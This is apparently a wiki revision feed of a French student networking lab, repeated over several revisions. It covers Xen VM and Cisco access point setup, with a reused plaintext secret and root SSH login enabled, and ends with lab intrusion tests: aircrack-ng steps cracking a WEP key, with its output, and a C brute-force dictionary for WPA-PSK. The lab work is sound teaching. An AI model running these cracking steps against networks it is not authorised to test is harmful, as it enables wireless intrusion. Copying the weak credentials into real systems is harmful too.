&lt;br /&gt;
&lt;br /&gt;
'''Connexion sur le disque de virtualisation :'''&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
'''Installation dans la machine virtuelle Xen'''&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
'''Configuration de la machine virtuelle'''&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
'''Configuration réseau'''&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à internet à ma machine virtuelle, je modifie le fichier suivant : &lt;br /&gt;
&lt;br /&gt;
/etc/networks/interfaces &lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 10.60.100.173/24&lt;br /&gt;
  up ip address add dev eth0 193.48.57.173/32 ; ip route add default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
  down ip address del dev eth0 193.48.57.173/32 ; ip route del default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Configuration ssh'''&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à ma machine virtuelle via ssh, je modifie le fichier suivant :&lt;br /&gt;
&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Relancer le service ssh :&lt;br /&gt;
&lt;br /&gt;
 service ssh restart&lt;br /&gt;
&lt;br /&gt;
Pour accéder à la machine virtuelle via ssh il faut desormais taper la commande suivante :&lt;br /&gt;
 ssh@193.48.57.173&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''Cassage de clef WEP d'un point d'accès WiFi'''&lt;br /&gt;
- Brancher une clef wifi sur le PC&lt;br /&gt;
&lt;br /&gt;
- Installer le paquet aircrack.ng&lt;br /&gt;
&lt;br /&gt;
- On peut lister les interfaces disponibles, en activant le mode moniteur de la carte réseau :&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
- Passer la carte WiFi en mode moniteur, espion du réseau sans fil :&lt;br /&gt;
 airmon-ng start wlan0mon &lt;br /&gt;
wlan0mon est le nouveau nom de la carte réseau donné par défaut car le précédent est considéré comme trop long par la machine.&lt;br /&gt;
&lt;br /&gt;
- Obtenir les trames WiFi sur tous les canaux :&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
- Noter le SSID de la machine à attaquer, ici cracotte03 : '''04:DA:D2:9C:50:53'''&lt;br /&gt;
&lt;br /&gt;
- Visulaiser les informations de cracotte03 : &lt;br /&gt;
 airodump-ng --channel 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
- Récupérer dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte03 :&lt;br /&gt;
 airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
J'attends qu'il y ai environ 30 000 trames de volées, ce processus prend un peu de temps.&lt;br /&gt;
&lt;br /&gt;
- Lancer le décryptage de la clef WEP : &lt;br /&gt;
 aircrack-ng lcrack-03.cap&lt;br /&gt;
Résultat :&lt;br /&gt;
  &lt;br /&gt;
                                                                        [00:00:00] Tested 813 keys (got 74481 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 17   F1(96512) E7(85504) BD(84992) 6F(84736) F2(83968) FA(83712) 12(83456) 0E(82688) C8(82176) 6A(81920) 70(81664) 11(81408) 95(81408) E9(81408) 75(81152) &lt;br /&gt;
    1    0/  1   8E(105472) 34(86016) B3(84480) 54(84224) 2A(83456) B9(83456) 87(82688) 06(82432) 64(82432) 65(82176) 21(81920) 8D(81664) 61(81408) 2F(81152) 3C(81152) &lt;br /&gt;
    2    5/  2   7E(83968) 0E(82432) BF(82432) A2(82176) 0A(81920) 9C(81920) A8(81664) DF(81664) E2(81664) A7(81408) B4(81408) 33(80896) 58(80896) 90(80640) 16(80384) &lt;br /&gt;
    3   17/  3   5B(80896) B2(80640) 5A(80384) B1(80384) C4(80384) F6(79616) 03(79360) 33(79360) DA(79360) 73(79104) 9E(79104) 30(78848) 86(78848) AD(78848) D6(78848) &lt;br /&gt;
    4    0/  1   71(107008) 8D(86528) 03(83712) 7A(83712) 5E(83200) AF(82944) 50(82688) CF(82688) 54(82432) C0(82432) 21(82176) BE(81920) CB(81920) 1A(81664) B5(81408) &lt;br /&gt;
        KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:09:99:99:99 ] &lt;br /&gt;
        Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
On constate que 813 clef ont été testées avant de trouver la bonne.&lt;br /&gt;
&lt;br /&gt;
'''Cassage de mot de passe WPA-PSK'''&lt;br /&gt;
&lt;br /&gt;
- Visualiser les interfaces&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
- Noter le SSID de la machine à attaquer :&lt;br /&gt;
 44:AD:D9:5F:87:02  -40        3        0    0   8  54e. WPA2 CCMP   PSK  kracotte03 &lt;br /&gt;
&lt;br /&gt;
- Coder un &amp;quot;dictionnaire&amp;quot; en C. On suppose que la clef WPA est un code de 8 chiffres :&lt;br /&gt;
 vim dico.c&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 int main(void){&lt;br /&gt;
        int x = 0;&lt;br /&gt;
        for(x=0; x&amp;lt;=99999999; x++){&lt;br /&gt;
                 printf(&amp;quot;%08d\n&amp;quot;,x);&lt;br /&gt;
        }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
- Compiler dico.c :&lt;br /&gt;
 gcc -Wall dico.c&lt;br /&gt;
&lt;br /&gt;
- Executer dico.c :&lt;br /&gt;
 ./a.out | more&lt;br /&gt;
&lt;br /&gt;
- Enregistrer le résultat du code dans un fichier txt :&lt;br /&gt;
 ./a.out &amp;gt; dico.txt&lt;br /&gt;
&lt;br /&gt;
- Lancer le traitement de lcrack-03 par dico.txt :&lt;br /&gt;
 aircrack-ng -w dico.txt lcrack-03&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56385</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56385"/>
				<updated>2021-11-19T08:41:20Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Installation de la machine virtuelle */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Connexion sur le disque de virtualisation :'''&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
'''Installation dans la machine virtuelle Xen'''&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
'''Configuration de la machine virtuelle'''&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
'''Configuration réseau'''&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à internet à ma machine virtuelle, je modifie le fichier suivant : &lt;br /&gt;
&lt;br /&gt;
/etc/networks/interfaces &lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 10.60.100.173/24&lt;br /&gt;
  up ip address add dev eth0 193.48.57.173/32 ; ip route add default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
  down ip address del dev eth0 193.48.57.173/32 ; ip route del default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Configuration ssh'''&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à ma machine virtuelle via ssh, je modifie le fichier suivant :&lt;br /&gt;
&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Relancer le service ssh :&lt;br /&gt;
&lt;br /&gt;
 service ssh restart&lt;br /&gt;
&lt;br /&gt;
Pour accéder à la machine virtuelle via ssh il faut desormais taper la commande suivante :&lt;br /&gt;
 ssh@193.48.57.173&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== '''Configuration DNS''' ==&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''Cassage de clef WEP d'un point d'accès WiFi'''&lt;br /&gt;
- Brancher une clef wifi sur le PC&lt;br /&gt;
&lt;br /&gt;
- Installer le paquet aircrack.ng&lt;br /&gt;
&lt;br /&gt;
- On peut lister les interfaces disponibles, en activant le mode moniteur de la carte réseau :&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
- Passer la carte WiFi en mode moniteur, espion du réseau sans fil :&lt;br /&gt;
 airmon-ng start wlan0mon &lt;br /&gt;
wlan0mon est le nouveau nom de la carte réseau donné par défaut car le précédent est considéré comme trop long par la machine.&lt;br /&gt;
&lt;br /&gt;
- Obtenir les trames WiFi sur tous les canaux :&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
- Noter le SSID de la machine à attaquer, ici cracotte03 : '''04:DA:D2:9C:50:53'''&lt;br /&gt;
&lt;br /&gt;
- Visulaiser les informations de cracotte03 : &lt;br /&gt;
 airodump-ng --channel 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
- Récupérer dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte03 :&lt;br /&gt;
 airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
J'attends qu'il y ai environ 30 000 trames de volées, ce processus prend un peu de temps.&lt;br /&gt;
&lt;br /&gt;
- Lancer le décryptage de la clef WEP : &lt;br /&gt;
 aircrack-ng lcrack-03.cap&lt;br /&gt;
Résultat :&lt;br /&gt;
  &lt;br /&gt;
                                                                        [00:00:00] Tested 813 keys (got 74481 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 17   F1(96512) E7(85504) BD(84992) 6F(84736) F2(83968) FA(83712) 12(83456) 0E(82688) C8(82176) 6A(81920) 70(81664) 11(81408) 95(81408) E9(81408) 75(81152) &lt;br /&gt;
    1    0/  1   8E(105472) 34(86016) B3(84480) 54(84224) 2A(83456) B9(83456) 87(82688) 06(82432) 64(82432) 65(82176) 21(81920) 8D(81664) 61(81408) 2F(81152) 3C(81152) &lt;br /&gt;
    2    5/  2   7E(83968) 0E(82432) BF(82432) A2(82176) 0A(81920) 9C(81920) A8(81664) DF(81664) E2(81664) A7(81408) B4(81408) 33(80896) 58(80896) 90(80640) 16(80384) &lt;br /&gt;
    3   17/  3   5B(80896) B2(80640) 5A(80384) B1(80384) C4(80384) F6(79616) 03(79360) 33(79360) DA(79360) 73(79104) 9E(79104) 30(78848) 86(78848) AD(78848) D6(78848) &lt;br /&gt;
    4    0/  1   71(107008) 8D(86528) 03(83712) 7A(83712) 5E(83200) AF(82944) 50(82688) CF(82688) 54(82432) C0(82432) 21(82176) BE(81920) CB(81920) 1A(81664) B5(81408) &lt;br /&gt;
        KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:09:99:99:99 ] &lt;br /&gt;
        Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
On constate que 813 clef ont été testées avant de trouver la bonne.&lt;br /&gt;
&lt;br /&gt;
'''Cassage de mot de passe WPA-PSK'''&lt;br /&gt;
&lt;br /&gt;
- Visualiser les interfaces&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
- Noter le SSID de la machine à attaquer :&lt;br /&gt;
 44:AD:D9:5F:87:02  -40        3        0    0   8  54e. WPA2 CCMP   PSK  kracotte03 &lt;br /&gt;
&lt;br /&gt;
- Coder un &amp;quot;dictionnaire&amp;quot; en C. On suppose que la clef WPA est un code de 8 chiffres :&lt;br /&gt;
 vim dico.c&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 int main(void){&lt;br /&gt;
        int x = 0;&lt;br /&gt;
        for(x=0; x&amp;lt;=99999999; x++){&lt;br /&gt;
                 printf(&amp;quot;%08d\n&amp;quot;,x);&lt;br /&gt;
        }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
- Compiler dico.c :&lt;br /&gt;
 gcc -Wall dico.c&lt;br /&gt;
&lt;br /&gt;
- Executer dico.c :&lt;br /&gt;
 ./a.out | more&lt;br /&gt;
&lt;br /&gt;
- Enregistrer le résultat du code dans un fichier txt :&lt;br /&gt;
 ./a.out &amp;gt; dico.txt&lt;br /&gt;
&lt;br /&gt;
- Lancer le traitement de lcrack-03 par dico.txt :&lt;br /&gt;
 aircrack-ng -w dico.txt lcrack-03&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56384</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56384"/>
				<updated>2021-11-19T08:36:43Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Tests d'intrusion */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Connexion sur le disque de virtualisation :'''&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
'''Installation dans la machine virtuelle Xen'''&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
